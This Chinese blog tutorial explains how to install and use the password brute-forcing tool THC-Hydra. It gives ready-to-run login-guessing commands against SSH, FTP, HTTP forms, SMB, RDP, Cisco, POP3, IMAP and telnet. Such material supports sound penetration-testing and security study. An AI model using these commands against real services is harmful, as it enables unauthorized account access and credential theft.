Linux下破解神器(thc org hc-hydra

最新推荐文章于 2023-07-11 10:32:24 发布
最新推荐文章于 2023-07-11 10:32:24 发布
阅读量1k 收藏
点赞数
分类专栏: LINUX/UNIX SHELL


二、安装

1、安装相关依赖包

  • Ubuntu/Debian
apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev libncurses5-dev hydra

  Debian和Ubuntu发行版,源里自带hydra,直接用apt-get在线安装。

  • Redhat/Fedora
yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
  • OpenSuSE
zypper install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel libncurses-devel

本实验用的是 CentOS release 5.6 (Final),执行yum install 后相关依赖包安装情况如下:

2、Hydra 安装

# wget http://www.thc.org/releases/hydra-7.4.1.tar.gz
# tar zxvf hydra-7.4.1.tar.gz
# cd hydra-7.4.1
# ./configure 
# make && make install

# ./configure 会检测当前系统一些组件配置,主要是对于破解支持模块的检测,可根据需要安装对应的支持库和依赖包。

# make

# make install

三、Syntax

# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

-R
继续从上一次进度接着破解

-S
大写,采用SSL链接

-s <PORT>
小写,可通过这个参数指定非默认端口

-l <LOGIN>
指定破解的用户,对特定用户破解

-L <FILE>
指定用户名字典

-p <PASS>
小写,指定密码破解,少用,一般是采用密码字典

-P <FILE>
大写,指定密码字典

-e <ns>
可选选项,n:空密码试探,s:使用指定用户和密码试探

-C <FILE>
使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数

-M <FILE>
指定目标列表文件一行一条

-o <FILE>
指定结果输出文件

-f
在使用-M参数以后,找到第一对登录名或者密码的时候中止破解

-t <TASKS>
同时运行的线程数,默认为16

-w <TIME>
设置最大超时的时间,单位秒,默认是30s

-v / -V
显示详细过程

server
目标ip

service
指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等

OPT
可选项

四、实例

1、手动创建用户名字典和密码字典,这里只是为了演示,只加了几个用户名和弱口令。真正破解时,需要利用密码字典生成器生成强大的字典。 

2、破解ssh:

# hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh

破解成功,直接显示结果。

也可以使用 -o 选项指定结果输出文件。

# hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh

五、其他类型密码破解

  • 破解ftp:
# hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
# hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
  • get方式提交,破解web登录:
  # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
  # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
  • post方式提交,破解web登录:

  该软件的强大之处就在于支持多种协议的破解,同样也支持对于web用户界面的登录破解,get方式提交的表单比较简单,这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是,如果目标网站登录时候需要验证码就无法破解了。带参数破解如下:

<form action="index.php" method="POST">
<input type="text" name="name" /><BR><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="提交">
</form>

  假设有以上一个密码登录表单,我们执行命令:

# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”

  说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。

  后面参数是网页中对应的表单字段的name 属性,后面<title>中的内容是表示错误猜解的返回信息提示,可以自定义。

  • 破解https:
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
  • 破解teamspeak:
# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
  • 破解cisco:
# hydra -P pass.txt 10.36.16.18 cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
  • 破解smb:
# hydra -l administrator -P pass.txt 10.36.16.18 smb
  • 破解pop3:
# hydra -l muts -P pass.txt my.pop3.mail pop3
  • 破解rdp:
# hydra ip rdp -l administrator -P pass.txt -V
  • 破解http-proxy:
# hydra -l admin -P pass.txt http-proxy://10.36.16.18
  • 破解imap:
# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
  • 破解telnet
# hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
freemindhack
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thc-hydra-master.tar.gz
08-08
hydra 是世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大。
Linux SSH密码暴力破解技术及攻击实战
weixin_34056162的博客
11-12 3074
对于 Linux 操作系统来说,一般通过 VNC、Teamviewer 和 SSH 等工具来进行远程管理,SSH 是 Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。 SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SS...
Centos hydra安装
zouk‘s blogs
07-25 3146
以为自己是个王者,其实才是青铜
Linux下暴力破解工具Hydra详解
weixin_34216036的博客
01-01 438
一、简介 Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are...
Hydra密码爆破工具使用教程图文教程(超详细)
wangyuxiang946的博客
12-06 2万+
Hydra也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。
thc-hydra-windows-master.zip
06-02
thc-hydra-windows-master.zip
thc-hydra-windows:适用于Windows的出色THC-HYDRA工具
05-10
THC-HYDRA-窗户 描述 为Windows编译的THC-HYDRA工具 特征 最新的9.1版本(2020-07-29) 仅从9.1版开始针对x64进行编译,针对x86进行了编译,因此它们应可在x86和x64平台上运行 与SSH,MySQL,PostgreSQL和RDP可选...
thc-hydra-master
05-06
Linux下的暴力密码在线破解工具Hydra下载 ,linux版本
Linux下的暴力密码在线破解工具Hydra
专注于性能调优、安全、自动化
07-01 3914
这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破解,其密码能否被破解关键在于字典是否足够强大。对于社会工程型渗透来说,有时能够得到事半功倍的效果。本文仅从安全角度去探讨测试,使用本文内容去做破坏者,与本人无关。 一、简介 hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。官网:http://www.thc.org/thc-hydra,可支持AF
Hydra暴力破解神器使用教程
CC__Faker的博客
03-30 1090
Hydra hydra是一个自动化的爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,已经集成到KaliLinux中,不过常用于破解各种协议的密码 支持的协议 支持在线破解的服务协议: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s]
hydra 一键安装包
01-07
Hydra一键安装包,内含脚本,直接运行脚本就可以安装了,由冰河大神亲自整理
hydra使用教程
weixin_30481087的博客
11-27 760
一.简介 hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FO...
网络登录暴力破解工具 - Hydra
weixin_30654419的博客
12-25 253
HC-HYDRA是一个支持多种网络服务的非常快速的网络登陆破解工具。这个工具是一个验证性质的工具,它被设计的主要目的是为研究人员和安全从业人员展示远程获取一个系统的认证权限是比较容易的! 目前支持运行的系统: Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1, OSX目前支持破解的服务: AFP, Cisco AAA, Cisco...
使用Kali Linux 暴力破解wifi密码详细步骤
热门推荐
爱琳先生的博客
07-06 2万+
如果WiFi密码设得足够复杂,即使有一个好的密码字典,要想破解成功花上个几天几十天甚至更久都是有可能滴。kali使用建议使用root用户,如果是2020或者2021版本的kali,执行airmon-ng之后显示找不到命令的话,可以在命令之前+sudo例如:sudo airmon-ng ,(然后输入开机密码即可,注意:Linux输入密码不会提示,只要输入了之后回车即可)使用网卡的监听模式抓取周围的无线网络数据包,其中我们需要用到的数据包是包含了WiFi密码的握手包,当有新用户连接WiFi时会发送握手包。
hydra详解(仅供学习参考)
最新发布
m0_50818626的博客
07-11 1244
Hydra是一款非常强大的暴力破解工具,由著名的黑客组织THC开发的一款开源暴力破解工具。hydra 参数 IP 服务。2、 加载对应命令开始爆破。三、各类协议破解具体方法。
CC00018.NavigationLog——|Hydra模拟黑客暴力破解|
yanqi_vip
03-22 1835
一、Hydra软件概念剖析 ### --- Hydra软件概念剖析 ~~~ Hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。 ~~~ Hydra中文翻译为:九头蛇,它是一款爆破神器。 ~~~ 可以对多种服务的账号和密码进行爆破,包括Web登录、数据库、SSH、FTP等服务。 ~~~ Hydra支持Linux、Windows、Mac平...
hydra篇 — hydra使用说明
|汾西公子
09-07 3182
介绍: 每个密码安全性研究都显示,最大的安全漏洞是密码。该工具是概念证明代码,旨在为研究人员和安全顾问提供可能性,以显示从远程访问系统的未经授权的访问将是多么容易。 此工具仅用于法律目的! 已经有几种登录黑客工具可用,但是,没有一个工具支持多种协议来攻击或支持并行连接。 经过测试,可以在Linux,Windows / Cygwin,Solaris,FreeBSD / OpenBSD,QNX(Blackberry 10)和MacOS上进行干净编译。 当前,该工具支持以下协议:Asterisk,AF
Hydra安装使用详解及实战
吃四碗饭的嘤嘤怪的博客
04-09 1万+
Hydra 可以根据使用者指定的用户字名典文件、密码字典文件、目标IP列表来暴力破解目标系统登录用户名和密码。并且其支持多种协议以及并发连接! 安装 GitHub项目地址:https://github.com/vanhauser-thc/thc-hydra wget https://github.com/vanhauser-thc/thc-hydra/archive/master...
thc--hydra暴力破解
weixin_30387339的博客
01-31 1484
hydra 官方网站 https://www.thc.org https://www.thc.org/thc-hydra/ https://github.com/vanhauser-thc/thc-hydra https://www.thc.org/blob/manhydra/thc_hydra_article_r3.pdf http://www.oracle.com/tec...
hydra -L user.txt 255 ⨯ 2 ⚙ Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-10 17:12:57 [ERROR] Invalid target definition! [ERROR] Either you use "www.example.com module [optional-module-parameters]" *or* you use the "module://www.example.com/optional-module-parameters" syntax!
07-11
根据错误提示,你需要确保在使用Hydra命令时正确定义目标。要么使用"www.example.com 模块 [可选模块参数]"的格式,要么使用"module://www.example.com/可选模块参数"的语法。请检查你的目标定义并确保它符合上述...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值